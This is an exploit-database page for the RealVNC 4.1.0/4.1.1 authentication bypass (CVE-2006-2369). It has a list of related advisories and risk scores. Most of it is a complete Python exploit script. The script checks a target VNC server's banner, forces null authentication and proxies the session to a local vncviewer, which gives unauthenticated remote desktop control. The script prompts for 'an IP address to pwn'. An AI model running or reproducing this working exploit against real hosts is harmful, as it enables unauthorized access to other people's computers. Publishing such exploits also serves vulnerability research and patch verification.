RealVNC 4.1.0/4.1.1 - Authentication Bypass

🗓️ 13 May 2012 00:00:00Reported by fdiskyouType

exploitdb🔗 www.exploit-db.com👁 154 Views

RealVNC 4.1.0/4.1.1 Authentication Bypass Exploit Python Scrip

Reporter	Title	Published	Views	Family All 37
0day.today	RealVNC Authentication Bypass	26 Aug 201100:00	–	zdt
GithubExploit	Exploit for Improper Authentication in Vnc Realvnc	8 Mar 202608:00	–	githubexploit
Circl	CVE-2006-2369	26 Aug 201100:00	–	circl
Check Point Advisories	RealVNC Password Authentication Bypass (CVE-2006-2369)	25 May 200600:00	–	checkpoint_advisories
CVE	CVE-2006-2369	15 May 200616:00	–	cve
Cvelist	CVE-2006-2369	15 May 200616:00	–	cvelist
Debian CVE	CVE-2006-2369	15 May 200616:00	–	debiancve
Exploit DB	RealVNC - Authentication Bypass (Metasploit)	26 Aug 201100:00	–	exploitdb
exploitpack	RealVNC 4.1.04.1.1 - Authentication Bypass	13 May 201200:00	–	exploitpack
Tenable Nessus	FreeBSD : vnc -- authentication bypass vulnerability (4645b98c-e46e-11da-9ae7-00123fcc6e5c)	19 May 200600:00	–	nessus

# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369 
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re

BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444

def pwn4ge(host, port):
	socket.setdefaulttimeout(5)
	server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
		server.connect((host, port))
	except socket.error, msg:
		print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1] 
		sys.exit();
	else:
		hello = server.recv(12)
		print "[*] Hello From Server: " + hello
		if hello != "RFB 003.008\n":
			print "[*] The remote VNC service is not vulnerable"
			sys.exit()
		else:
			print "[*] The remote VNC service is vulnerable"
			listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			try:
				listener.bind((BIND_ADDR, BIND_PORT))
			except socket.error , msg:
				print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
				sys.exit()
			print "[*] Listener Socket Bind Complete"
			listener.listen(10)
			print "[*] Launching local vncviewer"
			thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
			print "[*] Listener waiting for VNC connections on localhost"
			client, caddr = listener.accept()
			listener.close()
			client.send(hello)
			chello = client.recv(12)
			server.send(chello)
			methods = server.recv(2)
			print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
			client.send("\x01\x01")
			client.recv(1)
			server.send("\x01")
			server.recv(4)
			client.send("\x00\x00\x00\x00")
			print "[*] Proxying data between the connections..."
			running = True
			while running:
				selected = select.select([client, server], [], [])[0]
				if client in selected:
					buf = client.recv(8192)
					if len(buf) == 0:
						running = False
					server.send(buf)
				if server in selected and running:
					buf = server.recv(8192)
					if len(buf) == 0:
						running = False
					client.send(buf)
				pass
			client.close()
		server.close()
	sys.exit()

def printUsage():
	print "[*] Read the source, Luke!"

def main():
	try:
		SERV_ADDR = sys.argv[1]
		SERV_PORT = sys.argv[2]
	except:
		SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
		SERV_PORT = 5900
	try:
		socket.inet_aton(SERV_ADDR)
	except socket.error:
		printUsage()
	else:
		pwn4ge(SERV_ADDR, int(SERV_PORT))

if __name__ == "__main__":
	main()

13 May 2012 00:00Current

9.5High risk

Vulners AI Score9.5

CVSS 27.5

EPSS0.92336